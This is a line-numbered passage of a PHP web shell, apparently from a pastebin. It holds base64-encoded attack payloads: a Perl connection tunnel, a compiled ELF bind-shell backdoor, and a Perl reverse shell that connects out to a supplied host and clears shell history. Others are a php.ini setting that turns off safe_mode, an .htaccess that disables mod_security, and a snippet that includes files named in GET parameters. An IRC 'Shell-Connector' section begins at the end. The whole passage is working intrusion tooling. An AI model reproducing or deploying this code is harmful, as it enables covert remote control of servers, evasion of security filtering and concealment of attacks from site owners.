  2649. iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
  2650. aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
  2651. SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
  2652. xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
  2653. WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
  2654. CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
  2655. yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
  2656. I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
  2657. m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
  2658. IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
  2659. lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
  2660. QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
  2661. CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
  2662. c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
  2663. NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
  2664. UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
  2665. DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
  2666. ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
  2667. 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
  2668. $port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
  2669. $back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0=";
  2670. $php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
  2671. $htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
  2672. $sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
  2673.  
  2674. if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
  2675. {
  2676. $ircadmin=$_POST['ircadmin'];
  2677. $ircserver=$_POST['ircserver'];
  2678. $ircchan=$_POST['ircchanal'];
  2679. $irclabel=$_POST['ircname'];
  2680. echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>";
  2681. echo "<body bgcolor=\"black\" text=\"green\">";
